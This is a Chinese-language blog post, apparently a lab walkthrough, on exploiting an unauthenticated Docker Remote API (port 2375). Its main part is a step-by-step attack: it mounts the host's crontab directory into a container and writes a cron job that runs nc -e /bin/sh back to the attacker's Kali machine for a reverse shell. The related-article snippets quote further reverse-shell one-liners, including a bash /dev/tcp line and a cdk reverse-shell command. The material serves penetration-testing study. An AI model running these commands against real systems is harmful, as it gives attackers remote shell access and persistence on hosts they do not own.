docker未授权访问反弹shell

最新推荐文章于 2024-03-26 14:13:58 发布
最新推荐文章于 2024-03-26 14:13:58 发布
阅读量559 收藏
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/giaogiao123/article/details/119040425
版权

标题docker未授权访问反弹shell

首先我们要扫描端口“2375
发现目标端口2375开放,尝试访问ip:2375/version
在这里插入图片描述
目标靶机ip:192.168.30.101 (cente os 7)
攻击kali ip: 192.168.30.100 (kali2020.3)
访问出现版本泄露而且2375端口开放说明有未授权访问漏洞

在kali上开启监听1111端口

**nc -lvp 1111**

在这里插入图片描述输入以下命令 ip为目标ip

docker -H tcp://192.168.30.101:2375  version

在这里插入图片描述

docker -H tcp://192.168.30.101:2375 run -id -v /etc/crontabs:/tmp alpine:latest

在这里插入图片描述

docker -H tcp://192.168.30.101:2375 ps

在这里插入图片描述

docker -H tcp://192.168.30.101:2375 exec -it 4e87ea04b049  sh

输入

echo '***** /usr/bin/nc 192.168.30.100 1111 -e /bin/sh' >> /tmp/root

cat /tmp/root

在这里插入图片描述

在端口1111终端接受到shell
在这里插入图片描述
在这里插入图片描述

就此反弹shell成功

接下来可以选择提权或者维持权限。。。。。
笔者太菜了

jing!
关注
专栏目录
【漏洞挖掘】——94、Docker授权访问
Fly_鹏程万里
06-17 192
Docker是一种开源的容器化平台,用于构建、打包和运行应用程序及其依赖项,它通过使用容器来实现应用程序的轻量级隔离,使得应用程序可以在不同的环境中以一致的方式运行,Docker广泛应用于软件开发、持续集成/持续交付(CI/CD)、微服务架构、大规模部署和云计算等领域,它简化了应用程序的构建、交付。Docker Remote API是一个取代远程命令行界面(RCLI)的REST API,当该接口直接暴漏在外网环境中且作权限检查时,攻击者可以通过恶意调用相关的API实现远程命令执行。
web渗透测试漏洞复现:docker API授权漏洞复现并getshell
最新发布
HACKONE的博客
03-28 433
总结一句话:该命令的作用是在IP为192.168.1.106的远程Docker守护进程上,基于镜像ID为2dc39ba059dc的镜像启动一个新的交互式容器,并挂载主机的根目录到容器内的/mnt目录,然后在新容器中打开一个Bash shell。由于Docker API提供了丰富的功能,它不仅为Docker CLI(命令行界面)提供底层支持,也被许多其他工具和平台广泛采用,如Kubernetes、Docker Compose等,实现了对Docker容器的自动化管理和大规模部署。
CVE-2017-12149JBOSSas6.X反序列化(反弹shell版)
08-08
CVE-2017-12149 JBOSS as 6.X反序列化(反弹shell版)
Docker反弹shell
Fly_鹏程万里
12-27 2122
文章前言 本篇文章我们主要介绍一些在Docker反弹shell到远程服务器的方法 常见方法 Step 1:在远程服务器端监听端口 nc -lnvp 9999 Step 2:通过CDK反弹shell #命令格式 cdk run reverse-shell <ip>:<port> #使用实例 cdk run reverse-shell 192.168.17.143:9999 Step 3:成功获取到shell 其他技巧 我们还可以使用反引号...
[Shell]Docker remote api授权访问漏洞(Port=2375)
baguangman5501的博客
09-16 727
0x01 简介 该授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作dockerDocker remote Api授权访问的攻击原理与之前的Redis授权访问漏洞大同小异,都是通过向运行该应用的服务器写文件,从而拿到服务器的权限。 docker swarm是docker下的分...
容器内反弹shell的51种姿势
帮助别人等于帮助自己 ——MXi4oyu
11-19 1454
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
反弹shell方法
s0mor
08-16 717
Linux: hacker: 192.168.188.63 (kali) 目标: 192.168.72.130 (ubuntu) kali: 监听指定端口: nc -lvp 1234 ubuntu: 反弹shell 方法一 bash: bash -i >& /dev/tcp/192.168.188.63/1234 0>&1 方法二 python: ...
实战Docker授权访问提权
失心少年
12-04 965
docker授权访问提权
Docker授权访问漏洞
qq_48257021的博客
03-26 892
1)Docker是一个开源的引擎,可以轻松的为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署,包括VMs(虚拟机)、bare metal、OpenStack 集群和其他的基础应用平台。可以将Docker理解为一个集装箱,集装箱解决了什么问题?在一艘大船上,可以把货物规整的摆放起来,并且各种各样的货物被集装箱标准化了,集装箱和集装箱之间不会互相影响。
docker remote api授权访问漏洞(端口:2375)
墨痕诉清风的博客
11-11 4478
授权访问漏洞是因为可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作dockerdocker swarm是docker下的分布化应用的本地集群,在开放2375监听集群容器时,会调用这个apiurl输入ip:2375/version就会列出基本信息,和docker version命令效果一样。同样,url为ip:2375/v1.23/containers/json会列出容器信息,和docker ps -a效果一样。...
shell - Jenkinsfile:在Docker容器中运行sh步骤时权限被拒绝
wrfccl的专栏
09-17 2734
无法运行简单的Jenkins文件 – 例如 pipeline { agent { label ‘ssh-slave’ } stages { stage(‘Shell Test’) { steps { sh ‘echo “Hello World”’ } } } } 主服务器上Jenkins的日志文件显示容器已成功启动,但构建作业因类似消息而崩溃 sh: 1: /home/jenkins/worksp...
执行容器内的shell_Docker容器逃逸漏洞复现(CVE-2020-15257)
weixin_31014131的博客
01-14 264
一、漏洞介绍漏洞原理Containerd 是一个控制 runC 的守护进程,提供命令行客户端和API,用于在一个机器上管理容器。当在docker使用–net=host参数启动,与宿主机共享net namespace时,容器中的攻击者可以绕过访问权限访问 containerd 的控制API 进而导致权限提升,从而实现Docker容器逃逸。Containerd是行业标准的容器运行时,可作为Linux和...
docker 容器内没有权限运行文件
shanshanzhong123的博客
05-26 574
docker
docker提示没有权限,Got permission denied while trying to connect to the Docker daemon socket at unix:///va
公子小杰的博客
08-16 177
依次执行下面三行代码 #创建docker用户组 sudo groupadd docker #把当前登陆用户添加进docker组 sudo gpasswd -a 你的账户名 docker #更新docker用户组列表 newgrp docker
jenkins linux 权限不够,docker环境下的jenkins容器,进入后执行docker命令提示权限不够...
weixin_33270920的博客
05-09 408
docker下拉取jenkins镜像后,build 并 run 之后通过docker exec it [containerID] /bin/bash命令进入镜像后,再执行docker images命令提示权限不够:Got permission denied while trying to connect to the Docker daemon socket at unix:///var/r...
解决非root用户没有权限运行docker命令的问题
热门推荐
icodes
07-24 2万+
问题描述: ”Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get http://%2Fvar%2Frun%2Fdocker.sock/v1.26/images/json: dial unix /var/run/docker.soc...
Ubuntu虚机操作指南---2、关于docker命令反复失去执行权限的问题1.0
qq_32572707的博客
06-01 496
Ubuntu虚机操作指南---2、关于docker命令反复失去执行权限的问题1.0
centos系统-docker容器逃逸
suo_y的博客
04-20 1431
docker-runc CVE-2019-5736(runC容器逃逸漏洞) 1、准备漏洞环境: curl https://gist.githubusercontent.com/thinkycx/e2c9090f035d7b09156077903d6afa51/raw -o install.sh && bash install.sh 2、下载poc,编译脚本 a)下载poc:https://github.com/Frichetten/CVE-2019-5736-PoC b)修改payload
Docker2375端口授权getshell
Is_Linmouren的博客
10-21 387
Docker2375端口授权getshell 靶机:192.168.196.133 利用条件:docker2375授权、有可启动的主机镜像 1、判断是否可以利用漏洞 扫描端口发现开放端口22和2375 docker -H tcp://192.168.196.133:2375 ps 可以成功执行docker命令 [root@localhost ~]# docker -H 192.168.196.133:2375 images REPOSITORY
Docker Registry 授权访问漏洞
04-25
Docker Registry 授权访问漏洞是指攻击者可以在授权的情况下访问或者下载镜像。这种漏洞的危害性较大,因为攻击者可以使用被盗取的镜像发起攻击,造成不可预测的后果。要解决这个问题,可以通过限制访问 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值